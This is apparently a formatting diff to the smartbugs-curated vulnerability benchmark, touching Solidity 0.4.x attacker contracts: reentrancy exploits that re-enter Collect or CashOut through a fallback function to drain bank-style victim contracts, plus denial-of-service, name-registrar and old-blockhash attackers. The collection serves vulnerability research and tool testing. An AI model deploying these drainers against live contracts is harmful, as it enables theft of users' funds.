a/smartbugs-curated/0.4.x/contracts/bad_randomness/old_blockhash_attack.sol b/smartbugs-curated/0.4.x/contracts/bad_randomness/old_blockhash_attack.sol index a686aad..1d908d8 100644 --- a/smartbugs-curated/0.4.x/contracts/bad_randomness/old_blockhash_attack.sol +++ b/smartbugs-curated/0.4.x/contracts/bad_randomness/old_blockhash_attack.sol @@ -3,7 +3,6 @@ pragma solidity ^0.4.24; import "../dataset/bad_randomness/old_blockhash.sol"; contract PredictTheBlockHashChallengeAttacker { - PredictTheBlockHashChallenge target; function PredictTheBlockHashChallengeAttacker(address _target) public { @@ -18,7 +17,5 @@ contract PredictTheBlockHashChallengeAttacker { target.settle(); } - function() public payable { - } - -} \ No newline at end of file + function() public payable {} +} diff --git a/smartbugs-curated/0.4.x/contracts/denial_of_service/auction_attack.sol b/smartbugs-curated/0.4.x/contracts/denial_of_service/auction_attack.sol index 4a5e7db..3e2cedd 100644 --- a/smartbugs-curated/0.4.x/contracts/denial_of_service/auction_attack.sol +++ b/smartbugs-curated/0.4.x/contracts/denial_of_service/auction_attack.sol @@ -19,4 +19,4 @@ contract DosAuctionAttacker { (bool success, ) = auction.call.value(msg.value)(data); require(success, "Attack failed"); } -} \ No newline at end of file +} diff --git a/smartbugs-curated/0.4.x/contracts/denial_of_service/dos_simple_attack.sol b/smartbugs-curated/0.4.x/contracts/denial_of_service/dos_simple_attack.sol index c1a9dd3..0acf0b4 100644 --- a/smartbugs-curated/0.4.x/contracts/denial_of_service/dos_simple_attack.sol +++ b/smartbugs-curated/0.4.x/contracts/denial_of_service/dos_simple_attack.sol @@ -17,4 +17,4 @@ contract DosOneFuncAttacker { count++; } } -} \ No newline at end of file +} diff --git a/smartbugs-curated/0.4.x/contracts/other/name_registrar_attack.sol b/smartbugs-curated/0.4.x/contracts/other/name_registrar_attack.sol index 7e9b9d7..72bce7d 100644 --- a/smartbugs-curated/0.4.x/contracts/other/name_registrar_attack.sol +++ b/smartbugs-curated/0.4.x/contracts/other/name_registrar_attack.sol @@ -2,7 +2,6 @@ pragma solidity ^0.4.15; import "../dataset/other/name_registrar.sol"; contract NameRegistrarAttacker { - NameRegistrar public target; function NameRegistrarAttacker(address _target) { @@ -10,6 +9,9 @@ contract NameRegistrarAttacker { } function attack() { - target.register(0x0000000000000000000000000000000000000000000000000000000000000001, 0x1); + target.register( + 0x0000000000000000000000000000000000000000000000000000000000000001, + 0x1 + ); } } diff --git a/smartbugs-curated/0.4.x/contracts/reentrancy/0x01f8c4e3fa3edeb29e514cba738d87ce8c091d3f_attack.sol b/smartbugs-curated/0.4.x/contracts/reentrancy/0x01f8c4e3fa3edeb29e514cba738d87ce8c091d3f_attack.sol index 05217ce..386024d 100644 --- a/smartbugs-curated/0.4.x/contracts/reentrancy/0x01f8c4e3fa3edeb29e514cba738d87ce8c091d3f_attack.sol +++ b/smartbugs-curated/0.4.x/contracts/reentrancy/0x01f8c4e3fa3edeb29e514cba738d87ce8c091d3f_attack.sol @@ -2,7 +2,6 @@ pragma solidity ^0.4.19; import "../dataset/reentrancy/0x01f8c4e3fa3edeb29e514cba738d87ce8c091d3f.sol"; - contract MaliciousContract { PERSONAL_BANK personalBank; bool attackInitiated; @@ -11,24 +10,23 @@ contract MaliciousContract { personalBank = PERSONAL_BANK(_victimAddress); } - function attack(uint amount) public { + function attack(uint256 amount) public { require(!attackInitiated, "Attack already initiated"); require(amount >= 1 ether, "Must send at least 1 ether"); // Call the vulnerable function to start the reentrancy attack - + personalBank.Collect(amount); attackInitiated = true; } - function deposit() public payable{ + function deposit() public payable { require(msg.value >= 1 ether, "Must send at least 1 ether"); personalBank.Deposit.value(msg.value)(); } - - function() payable public { + function() public payable { // Re-enter the vulnerable function if there's still balance to collect if (!attackInitiated && address(personalBank).balance >= 1 ether) { personalBank.Collect(1 ether); diff --git a/smartbugs-curated/0.4.x/contracts/reentrancy/0x23a91059fdc9579a9fbd0edc5f2ea0bfdb70deb4_attack.sol b/smartbugs-curated/0.4.x/contracts/reentrancy/0x23a91059fdc9579a9fbd0edc5f2ea0bfdb70deb4_attack.sol index 208b196..daf28dd 100644 --- a/smartbugs-curated/0.4.x/contracts/reentrancy/0x23a91059fdc9579a9fbd0edc5f2ea0bfdb70deb4_attack.sol +++ b/smartbugs-curated/0.4.x/contracts/reentrancy/0x23a91059fdc9579a9fbd0edc5f2ea0bfdb70deb4_attack.sol @@ -2,27 +2,29 @@ pragma solidity ^0.4.19; import "../dataset/reentrancy/0x23a91059fdc9579a9fbd0edc5f2ea0bfdb70deb4.sol"; -contract MaliciousContract{ +contract MaliciousContract { PrivateBank privateBank; - - constructor(address _victimAddress) public{ - privateBank= PrivateBank (_victimAddress); + constructor(address _victimAddress) public { + privateBank = PrivateBank(_victimAddress); } - function attack(uint amount) public { - require(amount >= 1 ether, "Must attempt and attack with at least 1 ether"); + function attack(uint256 amount) public { + require( + amount >= 1 ether, + "Must attempt and attack with at least 1 ether" + ); privateBank.CashOut(amount); } - function deposit() public payable{ + function deposit() public payable { require(msg.value >= 1 ether, "Must add at least 1 ether"); - privateBank.Deposit.value(msg.value)(); + privateBank.Deposit.value(msg.value)(); } - function() payable public { + function() public payable { // Re-enter the vulnerable function if there's still balance to collect - if ( address(privateBank).balance >= 1 ether) { + if (address(privateBank).balance >= 1 ether) { privateBank.CashOut(1 ether); } } diff --git a/smartbugs-curated/0.4.x/contracts/reentrancy/0x4320e6f8c05b27ab4707cd1f6d5ce6f3e4b3a5a1_attack.sol b/smartbugs-curated/0.4.x/contracts/reentrancy/0x4320e6f8c05b27ab4707cd1f6d5ce6f3e4b3a5a1_attack.sol index 09e1e4b..117e825 100644 --- a/smartbugs-curated/0.4.x/contracts/reentrancy/0x4320e6f8c05b27ab4707cd1f6d5ce6f3e4b3a5a1_attack.sol +++ b/smartbugs-curated/0.4.x/contracts/reentrancy/0x4320e6f8c05b27ab4707cd1f6d5ce6f3e4b3a5a1_attack.sol @@ -1,29 +1,30 @@ pragma solidity ^0.4.19; import "../dataset/reentrancy/0x4320e6f8c05b27ab4707cd1f6d5ce6f3e4b3a5a1.sol"; -contract MaliciousContract{ +contract MaliciousContract { ACCURAL_DEPOSIT accural_deposit; - - constructor(address _victimAddress) public{ - accural_deposit= ACCURAL_DEPOSIT (_victimAddress); + constructor(address _victimAddress) public { + accural_deposit = ACCURAL_DEPOSIT(_victimAddress); } - function attack(uint amount) public { - require(amount >= 1 ether , "Must attempt an attack for at least 1 ether"); + function attack(uint256 amount) public { + require( + amount >= 1 ether, + "Must attempt an attack for at least 1 ether" + ); accural_deposit.Collect(amount); } - function deposit() public payable{ + function deposit() public payable { require(msg.value >= 1 ether, "Must add at least 1 ether"); - accural_deposit.Deposit.value(msg.value)(); + accural_deposit.Deposit.value(msg.value)(); } - - function() payable public { - // Re-enter the vulnerable function if there's still balance to collect - if ( address(accural_deposit).balance >= 1 ether) { + function() public payable { + // Re-enter the vulnerable function if there's still balance to collect + if (address(accural_deposit).balance >= 1 ether) { accural_deposit.Collect(1 ether); } } -} \ No newline at end of file +} diff --git a/smartbugs-curated/0.4.x/contracts/reentrancy/0x4e73b32ed6c35f570686b89848e5f39f20ecc106_attack.sol b/smartbugs-curated/0.4.x/contracts/reentrancy/0x4e73b32ed6c35f570686b89848e5f39f20ecc106_attack.sol index 12617b8..71d221a 100644 --- a/smartbugs-curated/0.4.x/contracts/reentrancy/0x4e73b32ed6c35f570686b89848e5f39f20ecc106_attack.sol +++ b/smartbugs-curated/0.4.x/contracts/reentrancy/0x4e73b32ed6c35f570686b89848e5f39f20ecc106_attack.sol @@ -2,7 +2,6 @@ pragma solidity ^0.4.19; import "../dataset/reentrancy/0x4e73b32ed6c35f570686b89848e5f39f20ecc106.sol"; - contract MaliciousContract { PRIVATE_ETH_CELL privateETHCell; bool attackInitiated; @@ -11,7 +10,7 @@ contract MaliciousContract { privateETHCell = PRIVATE_ETH_CELL(_victimAddress); } - function attack(uint amount) public { + function attack(uint256 amount) public { require(!attackInitiated, "Attack already initiated"); // Call the vulnerable function to start the reentrancy attack @@ -21,17 +20,15 @@ contract MaliciousContract { attackInitiated = true; } - function deposit() public payable{ + function deposit() public payable { require(msg.value >= 1 ether, "Must send at least 1 ether"); privateETHCell.Deposit.value(msg.value)(); } - - function() payable public { + function() public payable { // Re-enter the vulnerable function if there's still balance to collect if (!attackInitiated && address(privateETHCell).balance >= 1 ether) { privateETHCell.Collect(1 ether); } } } - diff --git a/smartbugs-curated/0.4.x/contracts/reentrancy/0x561eac93c92360949ab1f1403323e6db345cbf31_attack.sol b/smartbugs-curated/0.4.x/contracts/reentrancy/0x561eac93c92360949ab1f1403323e6db345cbf31_attack.sol index 34b57f8..dac6d1b 100644 --- a/smartbugs-curated/0.4.x/contracts/reentrancy/0x561eac93c92360949ab1f1403323e6db345cbf31_attack.sol +++ b/smartbugs-curated/0.4.x/contracts/reentrancy/0x561eac93c92360949ab1f1403323e6db345cbf31_attack.sol @@ -1,31 +1,31 @@ - pragma solidity ^0.4.19; import "../dataset/reentrancy/0x561eac93c92360949ab1f1403323e6db345cbf31.sol"; - -contract MaliciousContract{ +contract MaliciousContract { BANK_SAFE bank_SAFE; - - constructor(address _victimAddress) public{ - bank_SAFE= BANK_SAFE (_victimAddress); + constructor(address _victimAddress) public { + bank_SAFE = BANK_SAFE(_victimAddress); } - function attack(uint amount) public { - require(amount >= 1 ether, "Must attempt and attack with at least 1 ether"); - bank_SAFE.Collect(amount); + function attack(uint256 amount) public { + require( + amount >= 1 ether, + "Must attempt and attack with at least 1 ether" + ); + bank_SAFE.Collect(amount); } - function deposit() public payable{ + function deposit() public payable { require(msg.value >= 1 ether, "Must add at least 1 ether"); - bank_SAFE.Deposit.value(msg.value)(); + bank_SAFE.Deposit.value(msg.value)(); } - function() payable public { + function() public payable { // Re-enter the vulnerable function if there's still balance to collect - if ( address(bank_SAFE).balance >= 1 ether) { + if (address(bank_SAFE).balance >= 1 ether) { bank_SAFE.Collect(1 ether); } } -} \ No newline at end of file +} diff --git a/smartbugs-curated/0.4.x/contracts/reentrancy/0x7541b76cb60f4c60af330c208b0623b7f54bf615_attack.sol b/smartbugs-curated/0.4.x/contracts/reentrancy/0x7541b76cb60f4c60af330c208b0623b7f54bf615_attack.sol index d6e778a..53465ed 100644 --- a/smartbugs-curated/0.4.x/contracts/reentrancy/0x7541b76cb60f4c60af330c208b0623b7f54bf615_attack.sol +++ b/smartbugs-curated/0.4.x/contracts/reentrancy/0x7541b76cb60f4c60af330c208b0623b7f54bf615_attack.sol @@ -2,36 +2,30 @@ pragma solidity ^0.4.25; import "../dataset/reentrancy/0x7541b76cb60f4c60af330c208b0623b7f54bf615.sol"; - - - -contract MaliciousContract{ +contract MaliciousContract { U_BANK u_bank; - - constructor(address _victimAddress) public{ - u_bank= U_BANK (_victimAddress); + constructor(address _victimAddress) public { + u_bank = U_BANK(_victimAddress); } - function attack(uint amount) public { - require(amount >= 1 ether, "Must attempt and attack with at least 1 ether"); + function attack(uint256 amount) public { + require( + amount >= 1 ether, + "Must attempt and attack with at least 1 ether" + ); u_bank.Collect(amount); } - function deposit() public payable{ + function deposit() public payable { require(msg.value >= 1 ether, "Must add at least 1 ether"); - u_bank.Put.value(msg.value)(1); + u_bank.Put.value(msg.value)(1); } - function() payable public { + function() public payable { // Re-enter the vulnerable function if there's still balance to collect - if ( address(u_bank).balance >= 2 ether) { + if (address(u_bank).balance >= 2 ether) { u_bank.Collect(2 ether); } } - - - - } - diff --git a/smartbugs-curated/0.4.x/contracts/reentrancy/0x7a8721a9d64c74da899424c1b52acbf58ddc9782_attack.sol b/smartbugs-curated/0.4.x/contracts/reentrancy/0x7a8721a9d64c74da899424c1b52acbf58ddc9782_attack.sol index 9485c52..5c3b7f8 100644 --- a/smartbugs-curated/0.4.x/contracts/reentrancy/0x7a8721a9d64c74da899424c1b52acbf58ddc9782_attack.sol +++ b/smartbugs-curated/0.4.x/contracts/reentrancy/0x7a8721a9d64c74da899424c1b52acbf58ddc9782_attack.sol @@ -9,21 +9,18 @@ contract MaliciousContract { privateDeposit = PrivateDeposit(_victimAddress); } - function attack(uint amount) public { + function attack(uint256 amount) public { privateDeposit.CashOut(amount); - } - function deposit() public payable{ + function deposit() public payable { require(msg.value >= 1 ether, "Must send at least 1 ether"); privateDeposit.Deposit.value(msg.value)(); } - function() payable public { + function() public payable { // Re-enter the vulnerable function if there's still balance to collect - if ( address(privateDeposit).balance >= 1 ether) { + if (address(privateDeposit).balance >= 1 ether) { privateDeposit.CashOut(1 ether); } } - - } diff --git a/smartbugs-curated/0.4.x/contracts/reentrancy/0x7b368c4e805c3870b6c49a3f1f49f69af8662cf3_attack.sol b/smartbugs-curated/0.4.x/contracts/reentrancy/0x7b368c4e805c3870b6c49a3f1f49f69af8662cf3_attack.sol index ebef8e9..b340da1 100644 --- a/smartbugs-curated/0.4.x/contracts/reentrancy/0x7b368c4e805c3870b6c49a3f1f49f69af8662cf3_attack.sol +++ b/smartbugs-curated/0.4.x/contracts/reentrancy/0x7b368c4e805c3870b6c49a3f1f49f69af8662cf3_attack.sol @@ -2,32 +2,30 @@ pragma solidity ^0.4.25; import "../dataset/reentrancy/0x7b368c4e805c3870b6c49a3f1f49f69af8662cf3.sol"; -contract MaliciousContract{ +contract MaliciousContract { W_WALLET w_WALLET; - - constructor(address _victimAddress) public{ - w_WALLET= W_WALLET (_victimAddress); + constructor(address _victimAddress) public { + w_WALLET = W_WALLET(_victimAddress); } - function attack(uint amount) public { - require(amount >= 1 ether, "Must attempt and attack with at least 1 ether"); + function attack(uint256 amount) public { + require( + amount >= 1 ether, + "Must attempt and attack with at least 1 ether" + ); w_WALLET.Collect(amount); } - function deposit() public payable{ + function deposit() public payable { require(msg.value >= 1 ether, "Must add at least 1 ether"); - w_WALLET.Put.value(msg.value)(1); + w_WALLET.Put.value(msg.value)(1); } - function() payable public { + function() public payable { // Re-enter the vulnerable function if there's still balance to collect - if ( address(w_WALLET).balance >= 1 ether) { + if (address(w_WALLET).balance >= 1 ether) { w_WALLET.Collect(1 ether); } } - - - - -} \ No newline at end of file +} diff --git a/smartbugs-curated/0.4.x/contracts/reentrancy/0x8c7777c45481dba411450c228cb692ac3d550344_attack.sol b/smartbugs-curated/0.4.x/contracts/reentrancy/0x8c7777c45481dba411450c228cb692ac3d550344_attack.sol index 673cd29..0883fa1 100644 --- a/smartbugs-curated/0.4.x/contracts/reentrancy/0x8c7777c45481dba411450c228cb692ac3d550344_attack.sol +++ b/smartbugs-curated/0.4.x/contracts/reentrancy/0x8c7777c45481dba411450c228cb692ac3d550344_attack.sol @@ -2,28 +2,30 @@ pragma solidity ^0.4.19; import "../dataset/reentrancy/0x8c7777c45481dba411450c228cb692ac3d550344.sol"; -contract MaliciousContract{ +contract MaliciousContract { ETH_VAULT eth_VAULT; - - constructor(address _victimAddress) public{ - eth_VAULT= ETH_VAULT (_victimAddress); + constructor(address _victimAddress) public { + eth_VAULT = ETH_VAULT(_victimAddress); } - function attack(uint amount) public { - require(amount >= 1 ether, "Must attempt and attack with at least 1 ether"); - eth_VAULT.CashOut(amount); + function attack(uint256 amount) public { + require( + amount >= 1 ether, + "Must attempt and attack with at least 1 ether" + ); + eth_VAULT.CashOut(amount); } - function deposit() public payable{ + function deposit() public payable { require(msg.value >= 1 ether, "Must add at least 1 ether"); - eth_VAULT.Deposit.value(msg.value)(); + eth_VAULT.Deposit.value(msg.value)(); } - function() payable public { + function() public payable { // Re-enter the vulnerable function if there's still balance to collect - if ( address(eth_VAULT).balance >= 1 ether) { + if (address(eth_VAULT).balance >= 1 ether) { eth_VAULT.CashOut(1 ether); } } -} \ No newline at end of file +} diff --git a/smartbugs-curated/0.4.x/contracts/reentrancy/0x93c32845fae42c83a70e5f06214c8433665c2ab5_attack.sol b/smartbugs-curated/0.4.x/contracts/reentrancy/0x93c32845fae42c83a70e5f06214c8433665c2ab5_attack.sol index 73e7fcb..e35183c 100644 --- a/smartbugs-curated/0.4.x/contracts/reentrancy/0x93c32845fae42c83a70e5f06214c8433665c2ab5_attack.sol +++ b/smartbugs-curated/0.4.x/contracts/reentrancy/0x93c32845fae42c83a70e5f06214c8433665c2ab5_attack.sol @@ -2,29 +2,30 @@ pragma solidity ^0.4.19; import "../dataset/reentrancy/0x93c32845fae42c83a70e5f06214c8433665c2ab5.sol"; - -contract MaliciousContract{ +contract MaliciousContract { X_WALLET x_WALLET; - - constructor(address _victimAddress) public{ - x_WALLET= X_WALLET (_victimAddress); + constructor(address _victimAddress) public { + x_WALLET = X_WALLET(_victimAddress); } - function attack(uint amount) public { - require(amount >= 1 ether, "Must attempt and attack with at least 1 ether"); + function attack(uint256 amount) public { + require( + amount >= 1 ether, + "Must attempt and attack with at least 1 ether" + ); x_WALLET.Collect(amount); } - function deposit() public payable{ + function deposit() public payable { require(msg.value >= 1 ether, "Must add at least 1 ether"); - x_WALLET.Put.value(msg.value)(1); + x_WALLET.Put.value(msg.value)(1); } - function() payable public { + function() public payable { // Re-enter the vulnerable function if there's still balance to collect - if ( address(x_WALLET).balance >= 1 ether) { + if (address(x_WALLET).balance >= 1 ether) { x_WALLET.Collect(1 ether); } } -} \ No newline at end of file +} diff --git a/smartbugs-curated/0.4.x/contracts/reentrancy/0x941d225236464a25eb18076df7da6a91d0f95e9e_attack.sol b/smartbugs-curated/0.4.x/contracts/reentrancy/0x941d225236464a25eb18076df7da6a91d0f95e9e_attack.sol index dadf960..3b97f2e 100644 --- a/smartbugs-curated/0.4.x/contracts/reentrancy/0x941d225236464a25eb18076df7da6a91d0f95e9e_attack.sol +++ b/smartbugs-curated/0.4.x/contracts/reentrancy/0x941d225236464a25eb18076df7da6a91d0f95e9e_attack.sol @@ -1,30 +1,27 @@ pragma solidity ^0.4.19; import "../dataset/reentrancy/0x941d225236464a25eb18076df7da6a91d0f95e9e.sol"; - - -contract MaliciousContract{ +contract MaliciousContract { ETH_FUND eth_FUND; - - constructor(address _victimAddress) public{ - eth_FUND= ETH_FUND (_victimAddress); + constructor(address _victimAddress) public { + eth_FUND = ETH_FUND(_victimAddress); } - function attack(uint amount) public { + function attack(uint256 amount) public { require(amount >= 1 ether, "Must send at least 1 ether"); eth_FUND.CashOut(amount); } - function deposit() public payable{ + function deposit() public payable { require(msg.value >= 1 ether, "Must add at least 1 ether"); - eth_FUND.Deposit.value(msg.value)(); + eth_FUND.Deposit.value(msg.value)(); } - function() payable public { + function() public payable { // Re-enter the vulnerable function if there's still balance to collect - if ( address(eth_FUND).balance >= 1 ether) { + if (address(eth_FUND).balance >= 1 ether) { eth_FUND.CashOut(1 ether); } } -} \ No newline at end of file +} diff --git a/smartbugs-curated/0.4.x/contracts/reentrancy/0x96edbe868531bd23a6c05e9d0c424ea64fb1b78b_attack.sol b/smartbugs-curated/0.4.x/contracts/reentrancy/0x96edbe868531bd23a6c05e9d0c424ea64fb1b78b_attack.sol index 9726f53..42cb6df 100644 --- a/smartbugs-curated/0.4.x/contracts/reentrancy/0x96edbe868531bd23a6c05e9d0c424ea64fb1b78b_attack.sol +++ b/smartbugs-curated/0.4.x/contracts/reentrancy/0x96edbe868531bd23a6c05e9d0c424ea64fb1b78b_attack.sol @@ -9,20 +9,20 @@ contract MaliciousContract { penny_by_penny = PENNY_BY_PENNY(_victimAddress); } - function attack(uint amount) public { + function attack(uint256 amount) public { require(amount >= 1 ether, "Must send at least 1 ether"); penny_by_penny.Collect(amount); } - function deposit(uint timeLock) public payable { + function deposit(uint256 timeLock) public payable { require(msg.value >= 1 ether, "Must add at least 1 ether"); penny_by_penny.Put.value(msg.value)(timeLock); } - function() payable public { + function() public payable { // Re-enter the vulnerable function if there's still balance to collect if (address(penny_by_penny).balance >= 1 ether) { penny_by_penny.Collect(1 ether); } } -} \ No newline at end of file +} diff --git a/smartbugs-curated/0.4.x/contracts/reentrancy/0xaae1f51cf3339f18b6d3f3bdc75a5facd744b0b8_attack.sol b/smartbugs-curated/0.4.x/contracts/reentrancy/0xaae1f51cf3339f18b6d3f3bdc75a5facd744b0b8_attack.sol index 5650d35..447507c 100644 --- a/smartbugs-curated/0.4.x/contracts/reentrancy/0xaae1f51cf3339f18b6d3f3bdc75a5facd744b0b8_attack.sol +++ b/smartbugs-curated/0.4.x/contracts/reentrancy/0xaae1f51cf3339f18b6d3f3bdc75a5facd744b0b8_attack.sol @@ -1,29 +1,30 @@ - pragma solidity ^0.4.19; import "../dataset/reentrancy/0xaae1f51cf3339f18b6d3f3bdc75a5facd744b0b8.sol"; -contract MaliciousContract{ +contract MaliciousContract { DEP_BANK dep_bank; - - constructor(address _victimAddress) public{ - dep_bank= DEP_BANK (_victimAddress); + constructor(address _victimAddress) public { + dep_bank = DEP_BANK(_victimAddress); } - function attack(uint amount) public { - require(amount >= 1 ether, "Must attempt and attack with at least 1 ether"); + function attack(uint256 amount) public { + require( + amount >= 1 ether, + "Must attempt and attack with at least 1 ether" + ); dep_bank.Collect(amount); } - function deposit() public payable{ + function deposit() public payable { require(msg.value >= 1 ether, "Must add at least 1 ether"); - dep_bank.Deposit.value(msg.value)(); + dep_bank.Deposit.value(msg.value)(); } - function() payable public { + function() public payable { // Re-enter the vulnerable function if there's still balance to collect - if ( address(dep_bank).balance >= 1 ether) { + if (address(dep_bank).balance >= 1 ether) { dep_bank.Collect(1 ether); } } diff --git a/smartbugs-curated/0.4.x/contracts/reentrancy/0xb5e1b1ee15c6fa0e48fce100125569d430f1bd12_attack.sol b/smartbugs-curated/0.4.x/contracts/reentrancy/0xb5e1b1ee15c6fa0e48fce100125569d430f1bd12_attack.sol index 6ce0e03..48b37dd 100644 --- a/smartbugs-curated/0.4.x/contracts/reentrancy/0xb5e1b1ee15c6fa0e48fce100125569d430f1bd12_attack.sol +++ b/smartbugs-curated/0.4.x/contracts/reentrancy/0xb5e1b1ee15c6fa0e48fce100125569d430f1bd12_attack.sol @@ -1,28 +1,29 @@ - pragma solidity ^0.4.19; import "../dataset/reentrancy/0xb5e1b1ee15c6fa0e48fce100125569d430f1bd12.sol"; -contract MaliciousContract{ +contract MaliciousContract { Private_Bank private_Bank; - - constructor(address _victimAddress) public{ - private_Bank= Private_Bank (_victimAddress); + constructor(address _victimAddress) public { + private_Bank = Private_Bank(_victimAddress); } - function attack(uint amount) public { - require(amount >= 1 ether, "Must attempt and attack with at least 1 ether"); + function attack(uint256 amount) public { + require( + amount >= 1 ether, + "Must attempt and attack with at least 1 ether" + ); private_Bank.CashOut(amount); } - function deposit() public payable{ + function deposit() public payable { require(msg.value >= 1 ether, "Must add at least 1 ether"); - private_Bank.Deposit.value(msg.value)(); + private_Bank.Deposit.value(msg.value)(); } - function() payable public { + function() public payable { // Re-enter the vulnerable function if there's still balance to collect - if ( address(private_Bank).balance >= 1 ether) { + if (address(private_Bank).balance >= 1 ether) { private_Bank.CashOut(1 ether); } } diff --git a/smartbugs-curated/0.4.x/contracts/reentrancy/0xb93430ce38ac4a6bb47fb1fc085ea669353fd89e_attack.sol b/smartbugs-curated/0.4.x/contracts/reentrancy/0xb93430ce38ac4a6bb47fb1fc085ea669353fd89e_attack.sol index 568c967..163668c 100644 --- a/smartbugs-curated/0.4.x/contracts/reentrancy/0xb93430ce38ac4a6bb47fb1fc085ea669353fd89e_attack.sol +++ b/smartbugs-curated/0.4.x/contracts/reentrancy/0xb93430ce38ac4a6bb47fb1fc085ea669353fd89e_attack.sol @@ -2,28 +2,29 @@ pragma solidity ^0.4.19; import "../dataset/reentrancy/0xb93430ce38ac4a6bb47fb1fc085ea669353fd89e.sol"; - -contract MaliciousContract{ +contract MaliciousContract { PrivateBank privateBank; - - constructor(address _victimAddress) public{ - privateBank= PrivateBank (_victimAddress); + constructor(address _victimAddress) public { + privateBank = PrivateBank(_victimAddress); } - function attack(uint amount) public { - require(amount >= 1 ether, "Must attempt and attack with at least 1 ether"); + function attack(uint256 amount) public { + require( + amount >= 1 ether, + "Must attempt and attack with at least 1 ether" + ); privateBank.CashOut(amount); } - function deposit() public payable{ + function deposit() public payable { require(msg.value >= 1 ether, "Must add at least 1 ether"); - privateBank.Deposit.value(msg.value)(); + privateBank.Deposit.value(msg.value)(); } - function() payable public { + function() public payable { // Re-enter the vulnerable function if there's still balance to collect - if ( address(privateBank).balance >= 1 ether) { + if (address(privateBank).balance >= 1 ether) { privateBank.CashOut(1 ether); } } diff --git a/smartbugs-curated/0.4.x/contracts/reentrancy/0xbaf51e761510c1a11bf48dd87c0307ac8a8c8a4f_attack.sol b/smartbugs-curated/0.4.x/contracts/reentrancy/0xbaf51e761510c1a11bf48dd87c0307ac8a8c8a4f_attack.sol index 99d14b1..709525b 100644 --- a/smartbugs-curated/0.4.x/contracts/reentrancy/0xbaf51e761510c1a11bf48dd87c0307ac8a8c8a4f_attack.sol +++ b/smartbugs-curated/0.4.x/contracts/reentrancy/0xbaf51e761510c1a11bf48dd87c0307ac8a8c8a4f_attack.sol @@ -2,27 +2,29 @@ pragma solidity ^0.4.19; import "../dataset/reentrancy/0xbaf51e761510c1a11bf48dd87c0307ac8a8c8a4f.sol"; -contract MaliciousContract{ +contract MaliciousContract { ETH_VAULT eth_vault; - - constructor(address _victimAddress) public{ - eth_vault= ETH_VAULT (_victimAddress); + constructor(address _victimAddress) public { + eth_vault = ETH_VAULT(_victimAddress); } - function attack(uint amount) public { - require(amount >= 1 ether, "Must attempt and attack with at least 1 ether"); + function attack(uint256 amount) public { + require( + amount >= 1 ether, + "Must attempt and attack with at least 1 ether" + ); eth_vault.CashOut(amount); } - function deposit() public payable{ + function deposit() public payable { require(msg.value >= 1 ether, "Must add at least 1 ether"); - eth_vault.Deposit.value(msg.value)(); + eth_vault.Deposit.value(msg.value)(); } - function() payable public { + function() public payable { // Re-enter the vulnerable function if there's still balance to collect - if ( address(eth_vault).balance >= 1 ether) { + if (address(eth_vault).balance >= 1 ether) { eth_vault.CashOut(1 ether); } } diff --git a/smartbugs-curated/0.4.x/contracts/reentrancy/0xbe4041d55db380c5ae9d4a9b9703f1ed4e7e3888_attack.sol b/smartbugs-curated/0.4.x/contracts/reentrancy/0xbe4041d55db380c5ae9d4a9b9703f1ed4e7e3888_attack.sol index 5f7de9b..e374155 100644 --- a/smartbugs-curated/0.4.x/contracts/reentrancy/0xbe4041d55db380c5ae9d4a9b9703f1ed4e7e3888_attack.sol +++ b/smartbugs-curated/0.4.x/contracts/reentrancy/0xbe4041d55db380c5ae9d4a9b9703f1ed4e7e3888_attack.sol @@ -1,27 +1,29 @@ pragma solidity ^0.4.19; import "../dataset/reentrancy/0xbe4041d55db380c5ae9d4a9b9703f1ed4e7e3888.sol"; -contract MaliciousContract{ +contract MaliciousContract { MONEY_BOX money_box; - - constructor(address _victimAddress) public{ - money_box= MONEY_BOX (_victimAddress); + constructor(address _victimAddress) public { + money_box = MONEY_BOX(_victimAddress); } - function attack(uint amount) public { - require(amount >= 1 ether, "Must attempt and attack with at least 1 ether"); + function attack(uint256 amount) public { + require( + amount >= 1 ether, + "Must attempt and attack with at least 1 ether" + ); money_box.Collect(amount); } - function deposit() public payable{ + function deposit() public payable { require(msg.value >= 1 ether, "Must add at least 1 ether"); - money_box.Put.value(msg.value)(0); + money_box.Put.value(msg.value)(0); } - function() payable public { + function() public payable { // Re-enter the vulnerable function if there's still balance to collect - if ( address(money_box).balance >= 1 ether) { + if (address(money_box).balance >= 1 ether) { money_box.Collect(1 ether); } } diff --git a/smartbugs-curated/0.4.x/contracts/reentrancy/0xcead721ef5b11f1a7b530171aab69b16c5e66b6e_attack.sol b/smartbugs-curated/0.4.x/contracts/reentrancy/0xcead721ef5b11f1a7b530171aab69b16c5e66b6e_attack.sol index 1464f32..2be9930 100644 --- a/smartbugs-curated/0.4.x/contracts/reentrancy/0xcead721ef5b11f1a7b530171aab69b16c5e66b6e_attack.sol +++ b/smartbugs-curated/0.4.x/contracts/reentrancy/0xcead721ef5b11f1a7b530171aab69b16c5e66b6e_attack.sol @@ -2,29 +2,29 @@ pragma solidity ^0.4.25; import "../dataset/reentrancy/0xcead721ef5b11f1a7b530171aab69b16c5e66b6e.sol"; - - -contract MaliciousContract{ +contract MaliciousContract { WALLET wallet; - - constructor(address _victimAddress) public{ - wallet= WALLET (_victimAddress); + constructor(address _victimAddress) public { + wallet = WALLET(_victimAddress); } - function attack(uint amount) public { - require(amount >= 1 ether, "Must attempt and attack with at least 1 ether"); + function attack(uint256 amount) public { + require( + amount >= 1 ether, + "Must attempt and attack with at least 1 ether" + ); wallet.Collect(amount); } - function deposit() public payable{ + function deposit() public payable { require(msg.value >= 1 ether, "Must add at least 1 ether"); - wallet.Put.value(msg.value)(0); + wallet.Put.value(msg.value)(0); } - function() payable public { + function() public payable { // Re-enter the vulnerable function if there's still balance to collect - if ( address(wallet).balance >= 1 ether) { + if (address(wallet).balance >= 1 ether) { wallet.Collect(1 ether); } } diff --git a/smartbugs-curated/0.4.x/contracts/reentrancy/0xf015c35649c82f5467c9c74b7f28ee67665aad68_attack.sol b/smartbugs-curated/0.4.x/contracts/reentrancy/0xf015c35649c82f5467c9c74b7f28ee67665aad68_attack.sol index 631d0a2..c9f05ca 100644 --- a/smartbugs-curated/0.4.x/contracts/reentrancy/0xf015c35649c82f5467c9c74b7f28ee67665aad68_attack.sol +++ b/smartbugs-curated/0.4.x/contracts/reentrancy/0xf015c35649c82f5467c9c74b7f28ee67665aad68_attack.sol @@ -2,29 +2,30 @@ pragma solidity ^0.4.25; import "../dataset/reentrancy/0xf015c35649c82f5467c9c74b7f28ee67665aad68.sol"; - -contract MaliciousContract{ +contract MaliciousContract { MY_BANK my_bank; - - constructor(address _victimAddress) public{ - my_bank= MY_BANK (_victimAddress); + constructor(address _victimAddress) public { + my_bank = 